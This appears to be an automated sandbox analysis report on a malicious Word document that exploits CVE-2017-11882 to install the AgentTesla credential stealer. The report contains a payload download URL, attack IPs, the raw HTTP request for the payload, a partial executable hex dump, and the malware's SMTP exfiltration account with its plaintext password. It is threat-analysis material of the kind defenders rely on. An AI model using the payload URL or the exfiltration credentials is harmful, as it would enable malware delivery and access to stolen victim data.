Loading ...

Play interactive tourEdit tour

Windows Analysis Report Specification.doc

Overview

General Information

Sample Name:Specification.doc
Analysis ID:502702
MD5:a9c264b36e9a8bcb07dd7caad3e74c7a
SHA1:b123be7f202496264a25ea58d9b6116eba3de5da
SHA256:a386ffc6861f5ddad443d3b4d98d91a0bed209b7662e24fbc0bb2478a417d177
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Installs a global keyboard hook
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Adds / modifies Windows certificates
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1916 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 684 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • edufyrigefy4utwgqeoriufj4ce.exe (PID: 1184 cmdline: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe MD5: 60997F0CBBC87CE8E5581B38C39F78B7)
      • schtasks.exe (PID: 2552 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • newapp.exe (PID: 2852 cmdline: 'C:\Users\user\AppData\Roaming\newapp\newapp.exe' MD5: 60997F0CBBC87CE8E5581B38C39F78B7)
    • schtasks.exe (PID: 2856 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC63.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • newapp.exe (PID: 2924 cmdline: C:\Users\user\AppData\Roaming\newapp\newapp.exe MD5: 60997F0CBBC87CE8E5581B38C39F78B7)
  • newapp.exe (PID: 2628 cmdline: 'C:\Users\user\AppData\Roaming\newapp\newapp.exe' MD5: 60997F0CBBC87CE8E5581B38C39F78B7)
    • schtasks.exe (PID: 236 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp10D3.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • newapp.exe (PID: 2712 cmdline: C:\Users\user\AppData\Roaming\newapp\newapp.exe MD5: 60997F0CBBC87CE8E5581B38C39F78B7)
    • newapp.exe (PID: 1136 cmdline: C:\Users\user\AppData\Roaming\newapp\newapp.exe MD5: 60997F0CBBC87CE8E5581B38C39F78B7)
    • newapp.exe (PID: 2656 cmdline: C:\Users\user\AppData\Roaming\newapp\newapp.exe MD5: 60997F0CBBC87CE8E5581B38C39F78B7)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "yashanka.patabandige@dlmahtea.co", "Password": "FocusYourSEF@123", "Host": "mail.privateemail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.663485397.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000011.00000002.663485397.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000008.00000002.483735795.00000000035BF000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 34 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.newapp.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              11.2.newapp.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                17.2.newapp.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  17.2.newapp.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 28 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 143.95.246.178, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 684, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 684, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\booobb[1].exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe, CommandLine: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe, NewProcessName: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe, OriginalFileName: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 684, ProcessCommandLine: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe, ProcessId: 1184

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 11.2.newapp.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "yashanka.patabandige@dlmahtea.co", "Password": "FocusYourSEF@123", "Host": "mail.privateemail.com"}

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: global trafficDNS query: name: sauberprint.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 143.95.246.178:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 143.95.246.178:80
                      Source: Joe Sandbox ViewASN Name: ASMALLORANGE1US ASMALLORANGE1US
                      Source: Joe Sandbox ViewIP Address: 198.54.122.60 198.54.122.60
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Thu, 14 Oct 2021 08:26:25 GMTContent-Type: application/x-msdownloadContent-Length: 620544Connection: keep-aliveLast-Modified: Wed, 13 Oct 2021 22:24:09 GMTAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 db 59 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 60 06 00 00 16 03 00 00 00 00 00 fa 7f 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 7f 06 00 4f 00 00 00 00 80 06 00 d4 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 60 06 00 00 20 00 00 00 60 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 13 03 00 00 80 06 00 00 14 03 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 09 00 00 02 00 00 00 76 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 7f 06 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 6e 00 00 0c 60 00 00 03 00 00 00 85 00 00 06 a8 ce 00 00 00 b1 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 1a 00 00 0a 00 00 2a 00 00 13 30 04 00 6d 00 00 00 01 00 00 11 00 1f 20 0a 06 8d 4c 00 00 01 0b 16 0c 2b 4a 00 02 6c 23 00 00 00 00 00 00 00 40 06 17 59 08 59 6c 28 1b 00 00 0a fe 05 16 fe 01 0d 09 2c 21 00 07 08 17 9e 02 23 00 00 00 00 00 00 00 40 06 17 59 08 59 6c 28 1b 00 00 0a 69 59 10 00 00 2b 04 07 08 16 9e 00 08 17 58 0c 08 07 8e 69 fe 04 13 04 11 04 2d aa 07 13 05 2b 00 11 05 2a 00 00 00 13 30 04 00 43 00 00 00 02 00 00 11 00 16 0a 16 0b 2b 2a 00 02 07 94 17 fe 01 0c 08 2c 1a 06 23 00 00 00 00 00 00 00 40 02 8e 69 07 59 17 59 6c 28 1b 00 00 0a 69 58 0a 00 07 17 58 0b 07 02 8e 69 fe 04 0d 09 2d cc 06 13 04 2b 00 11 04 2a 00 13 30 03 00 34 00 00 00 03 00 00 11 00 18 8d 4e 00 00 01 0b 07 16 72 01 00 00 70 a2 07 17 72 5b 00 00 70 a2 02 16 fe 01 0c 08 2c 08 00 07 16 9a 0a 00 2b 06 00 07 17 9a 0a 00 06 0d 2b 00 09 2a 13 30 03 00 40 00 00 00 04 00 00 11 00 16 0b 28 06 00 00 06 00 00 28 07 00 00 06 00 72 6d 00 00 70 28 1c 00 00 0a 00 28 1d 00 00 0a 0a 06 72 e
                      Source: global trafficHTTP traffic detected: GET /lupin/booobb.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sauberprint.comConnection: Keep-Alive
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.54.122.60:587
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.54.122.60:587
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, newapp.exe, 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: newapp.exe, 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: newapp.exe, 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmpString found in binary or memory: http://Nbucou.com
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515898451.00000000060F0000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515994593.0000000006113000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der1
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515994593.0000000006113000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der11
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.645559784.00000000060F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.644743340.0000000008850000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.505169057.00000000060EF000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.co
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.645695967.00000000005A5000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.505245755.00000000060E3000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabgB
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.665455883.0000000002588000.00000004.00000001.sdmpString found in binary or memory: http://mail.privateemail.com
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.645559784.00000000060F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.415369499.00000000056D0000.00000002.00020000.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.667587531.0000000005B10000.00000002.00020000.sdmp, newapp.exe, 00000008.00000002.484210437.00000000057B0000.00000002.00020000.sdmp, newapp.exe, 0000000B.00000002.507578016.0000000005BC0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.413432114.0000000002431000.00000004.00000001.sdmp, newapp.exe, 00000008.00000002.483448349.0000000002476000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.671412974.0000000007FE0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.620886421.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://users.ocsp.d-trustS
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.415369499.00000000056D0000.00000002.00020000.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.667587531.0000000005B10000.00000002.00020000.sdmp, newapp.exe, 00000008.00000002.484210437.00000000057B0000.00000002.00020000.sdmp, newapp.exe, 0000000B.00000002.507578016.0000000005BC0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516031777.00000000060BD000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516031777.00000000060BD000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
                      Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.413103348.0000000000B80000.00000004.00020000.sdmp, newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
